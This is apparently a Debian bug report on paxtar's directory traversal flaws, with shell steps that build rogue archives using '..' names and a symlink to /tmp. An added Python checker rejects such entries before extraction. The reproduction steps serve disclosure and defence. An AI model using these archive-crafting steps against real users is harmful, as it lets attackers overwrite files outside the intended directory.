Package: pax
Version: 1:20140703-2
Tags: security
paxtar is susceptible to directory traversal vulnerabilities. They can
be exploited by a rogue archive to write files outside the current
directory.
1. paxtar will extract files with .. components in names.
For example, let's create a sample archive:
echo hello > ../file
paxtar cvf test.tar ../file
rm ../file
and then test it:
paxtar xvf test.tar
This will create a file "../file".
2. While extracting an archive, it will extract symlinks and then follow
them if they are referenced in further entries.
For example, let's create a sample archive:
ln -s /tmp dir
paxtar cvf test.tar dir
rm dir
mkdir dir
echo hello > dir/file
paxtar rvf test.tar dir/file
rm -r dir
and then test it:
paxtar xvf test.tar
This will create a symlink "dir" in the current directory and a file
"/tmp/file".
--
Alexander Cherepanov
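The check a consumer of untrusted archives wants before calling any extractor is the one below: walk the entries once, reject names that leave the extraction directory (case 1 above) and reject any entry whose parent component was delivered as a symlink by an earlier entry (case 2). This is an added example written for this page, not code from the bug report or from pax; it uses Python's tarfile to build the two archives from the report in memory (constructed test data), plus a clean one for contrast, so it runs offline and never touches /tmp.

```python
"""Pre-extraction check for the two paxtar traversal patterns: entries with
'..' (or absolute) names, and entries written through a symlink delivered by
an earlier entry. Added example, not code from the bug report or from pax;
the archives are constructed in memory with Python's tarfile so it runs offline."""
import io
import posixpath
import tarfile
import tempfile

# Constructed test archives mirroring the two cases in the report.
DOTDOT_ENTRIES = [("../file", "file", b"hello\n")]
SYMLINK_ENTRIES = [("dir", "symlink", "/tmp"), ("dir/file", "file", b"hello\n")]
CLEAN_ENTRIES = [("dir/file", "file", b"hello\n")]


def build_archive(entries):
    """Build an uncompressed tar in memory from (name, kind, payload) tuples;
    kind is 'file' (payload: bytes) or 'symlink' (payload: link target).
    TarInfo names are stored verbatim, so '..' components survive."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, kind, payload in entries:
            info = tarfile.TarInfo(name=name)
            if kind == "symlink":
                info.type = tarfile.SYMTYPE
                info.linkname = payload
                tar.addfile(info)
            else:
                info.size = len(payload)
                tar.addfile(info, io.BytesIO(payload))
    return buf.getvalue()


def _escapes(path):
    """True if a path, once normalised, leaves the extraction directory."""
    norm = posixpath.normpath(path)
    return posixpath.isabs(path) or norm == ".." or norm.startswith("../")


def unsafe_entries(archive):
    """Return (name, reason) for every entry that would write outside the
    extraction directory. Symlinks seen so far are remembered so that a later
    entry beneath one is flagged even though its own name looks clean."""
    problems = []
    symlinks = {}  # normalised archive path -> link target, entries seen so far
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r") as tar:
        for m in tar:
            name = posixpath.normpath(m.name)
            if _escapes(m.name):  # case 1: '../file' or '/etc/...'
                problems.append((m.name, "name escapes extraction directory"))
                continue
            parts = name.split("/")
            # Any parent component that an earlier entry made a symlink means
            # this entry is written through it (case 2 in the report).
            through = next(("/".join(parts[:i]) for i in range(1, len(parts))
                            if "/".join(parts[:i]) in symlinks), None)
            if through is not None:
                problems.append((m.name, "written through symlink %r -> %r"
                                 % (through, symlinks[through])))
                continue
            if m.issym():
                # Resolve the target relative to the link's own directory.
                target = posixpath.join(posixpath.dirname(name), m.linkname)
                if _escapes(target):
                    problems.append((m.name, "symlink target %r escapes" % m.linkname))
                symlinks[name] = m.linkname
            elif m.islnk() and _escapes(m.linkname):
                problems.append((m.name, "hard link target %r escapes" % m.linkname))
    return problems


def safe_extract(archive, dest):
    """Extract only if the check passes; returns the problem list (empty on success).
    On Python versions that provide it, tarfile's 'data' filter is applied as well."""
    problems = unsafe_entries(archive)
    if not problems:
        opts = {"filter": "data"} if hasattr(tarfile, "data_filter") else {}
        with tarfile.open(fileobj=io.BytesIO(archive), mode="r") as tar:
            tar.extractall(dest, **opts)
    return problems


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as dest:
        for label, entries in (("dotdot", DOTDOT_ENTRIES),
                               ("symlink", SYMLINK_ENTRIES),
                               ("clean", CLEAN_ENTRIES)):
            problems = safe_extract(build_archive(entries), dest)
            print(label, "rejected" if problems else "extracted", problems)
```

Note that the symlink case is caught twice: once because the link target is absolute, and again because "dir/file" would be written through it. The second check is the important one, since a link to a relative, in-tree target such as "dir" is harmless on its own but still redirects every later entry that names it as a parent; the check therefore flags any write through an earlier symlink, not only links that point outside.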